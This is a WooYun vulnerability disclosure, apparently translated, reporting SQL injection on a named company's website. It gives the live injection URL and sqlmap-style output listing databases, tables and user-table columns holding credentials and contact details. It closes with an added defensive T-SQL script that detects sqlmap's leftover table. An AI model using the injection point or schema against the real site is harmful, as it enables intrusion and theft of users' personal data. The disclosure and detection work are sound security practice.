WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --------------------------- http://drop.zone.ci/
2014-07-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public
2014-10-09: The vendor has actively ignored the vulnerability; details disclosed to the public
Baidu Baijia issue 67 (yesterday) debated whether Dixintong's transformation has succeeded. Well, it has only just gone public and it already has a vulnerability this big.
Injection point:
http://www.dixintong.com/activityshow.aspx?aId=660
Databases:
available databases [9]:
[*] crm
[*] dixintong
[*] master
[*] model
[*] msdb
[*] official
[*] tempdb
[*] wxcrm
[*] xnyycrm
A look at a few tables makes it clear.
Database: dixintong
[50 tables]
+----------------------------+
| dbo.Account                |
| dbo.AccountAddr            |
| dbo.AccountBasics          |
| dbo.AccountCash            |
| dbo.AccountFavor           |
| dbo.AccountMess            |
| dbo.AccountMessItem        |
| dbo.AccountSafe            |
| dbo.AccountSubscribe       |
| dbo.DictArea1              |
| dbo.DictArea2              |
| dbo.DictArea3              |
| dbo.DictCateX              |
| dbo.DictCourse             |
| dbo.Product                |
| dbo.ProductAssess          |
| dbo.ProductAssrep          |
| dbo.ProductAttrItem        |
| dbo.ProductFlag            |
| dbo.ProductImage           |
| dbo.ProductMobile          |
| dbo.ProductMobileRatio     |
| dbo.ProductNote            |
| dbo.ProductNoteTemp        |
| dbo.ProductPrice           |
| dbo.ProductStatus          |
| dbo.ProductSuburb          |
| dbo.ProductTemp            |
| dbo.ProductTempItem        |
| dbo.SaleOrder              |
| dbo.SaleOrderItem          |
| dbo.SaleOrderShare         |
| dbo.SaleOrderStatus        |
| dbo.Staff                  |
| dbo.SysChannel             |
| dbo.SysMail                |
| dbo.SysMailTemp            |
| dbo.SysPower               |
| dbo.SysRole                |
| dbo.SysRolePower           |
| dbo.SysStatistics          |
| dbo.SysUser                |
| dbo.SysUserRole            |
| dbo.V_AccountFavor         |
| dbo.V_AccountMess          |
| dbo.V_PersonlAccountReport |
| dbo.V_Product              |
| dbo.V_ProductPrice         |
| dbo.V_SaleOrder            |
| dbo.V_SaleOrderItemReport  |
+----------------------------+
Database: dixintong
Table: dbo.Staff
[7 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| Area       | nvarchar |
| Company    | nvarchar |
| CreateTime | datetime |
| SoreName   | nvarchar |
| StaffCode  | nvarchar |
| StaffName  | nvarchar |
| SysNo      | int      |
+------------+----------+
Database: crm
[59 tables]
+----------------------------+
| dbo.AdminNav               |
| dbo.Article                |
| dbo.ArticleClass           |
| dbo.BrandInfo              |
| dbo.BugerInfo              |
| dbo.Company                |
| dbo.CompanyProduct         |
| dbo.Dispose                |
| dbo.EOrderMem              |
| dbo.HistoryCompanyProduct  |
| dbo.HistoryProduct         |
| dbo.ProCPU                 |
| dbo.ProColor               |
| dbo.ProDB                  |
| dbo.ProDjms                |
| dbo.ProFbl                 |
| dbo.ProMemory              |
| dbo.ProOperator            |
| dbo.ProPlatform            |
| dbo.ProPmcc                |
| dbo.ProPmcz                |
| dbo.ProSxtpx               |
| dbo.ProSystem              |
| dbo.ProTypeInfo            |
| dbo.ProWlpl                |
| dbo.ProWlzs                |
| dbo.ProXsmd                |
| dbo.Product                |
| dbo.ProductClass           |
| dbo.Reservation            |
| dbo.Role                   |
| dbo.SysUser                |
| dbo.SystemLog              |
| dbo.View_Article           |
| dbo.View_CompanyProduct    |
| dbo.View_Orders            |
| dbo.View_Product           |
| dbo.View_QuestionAndAnswer |
| dbo.View_contractProduct   |
| dbo.View_mdztorder         |
| dbo.View_questionnaire     |
| dbo.activity               |
| dbo.answer                 |
| dbo.comtowxgroups          |
| dbo.contractProduct        |
| dbo.greentravel            |
| dbo.mdztorders             |
| dbo.member                 |
| dbo.message                |
| dbo.mount                  |
| dbo.orders                 |
| dbo.orderstate             |
| dbo.question               |
| dbo.questionnaire          |
| dbo.sqlmapoutput           |
| dbo.staffinfo              |
| dbo.storeType              |
| dbo.storefront             |
| dbo.wxhuodong              |
+----------------------------+
User information table:
Database: crm
Table: dbo.member
[22 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| address        | varchar  |
| addtime        | datetime |
| area           | varchar  |
| city           | varchar  |
| Email          | varchar  |
| Id             | int      |
| integral       | int      |
| IsOldmem       | int      |
| isOpen         | int      |
| lastLogIp      | varchar  |
| lasttime       | datetime |
| loginName      | varchar  |
| loginPwd       | varchar  |
| logNum         | int      |
| memberCode     | varchar  |
| mlevel         | varchar  |
| nickname       | varchar  |
| productPicture | varchar  |
| province       | varchar  |
| QQ             | varchar  |
| tel            | varchar  |
| weixin         | varchar  |
+----------------+----------+
Look at all the tables above. Everything is exposed. Fix it quickly. I recommend a penetration test of the site.
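One detail in the crm table list above deserves a defender's attention: dbo.sqlmapoutput is the scratch table sqlmap creates on SQL Server when it executes stacked queries through an injection point, so its presence suggests the injection had already been exercised for writes before this report. The following T-SQL is an added example (not part of the original report); it assumes sysadmin access to the instance behind the site and sweeps every online database for that table, returning its creation time as an incident-timeline anchor.

```sql
-- Added example, not from the original report. Run as sysadmin on the
-- SQL Server instance behind the site. sqlmap names its temporary
-- scratch table "sqlmapoutput"; finding it in any database means
-- stacked queries were already executed through an injection point.
SET NOCOUNT ON;

DECLARE @db sysname, @sql nvarchar(max);
DECLARE @found TABLE (
    db_name     sysname,
    schema_nm   sysname,
    table_nm    sysname,
    create_date datetime,
    modify_date datetime,
    row_count   bigint
);

-- Iterate online databases (tempdb is transient and skipped).
DECLARE dbs CURSOR LOCAL FAST_FORWARD FOR
    SELECT name FROM sys.databases
    WHERE state_desc = 'ONLINE' AND name <> 'tempdb';

OPEN dbs;
FETCH NEXT FROM dbs INTO @db;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- USE inside dynamic SQL scopes the catalog views to @db for this batch.
    SET @sql = N'USE ' + QUOTENAME(@db) + N';
        SELECT DB_NAME(), s.name, t.name, t.create_date, t.modify_date,
               SUM(p.rows)
        FROM sys.tables t
        JOIN sys.schemas s    ON s.schema_id = t.schema_id
        JOIN sys.partitions p ON p.object_id = t.object_id
                             AND p.index_id IN (0, 1)   -- heap or clustered index
        WHERE t.name LIKE N''sqlmap%''
        GROUP BY s.name, t.name, t.create_date, t.modify_date;';
    INSERT INTO @found EXEC sp_executesql @sql;
    FETCH NEXT FROM dbs INTO @db;
END
CLOSE dbs;
DEALLOCATE dbs;

-- Any row here is an indicator of prior exploitation; create_date is the
-- earliest time the injection was used to write into that database.
SELECT * FROM @found ORDER BY create_date;
```

The same sweep can be widened to other attacker-created names once the web server logs for activityshow.aspx have been reviewed; the table's create_date bounds where in those logs to start looking.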
Unable to contact the vendor, or the vendor actively declined.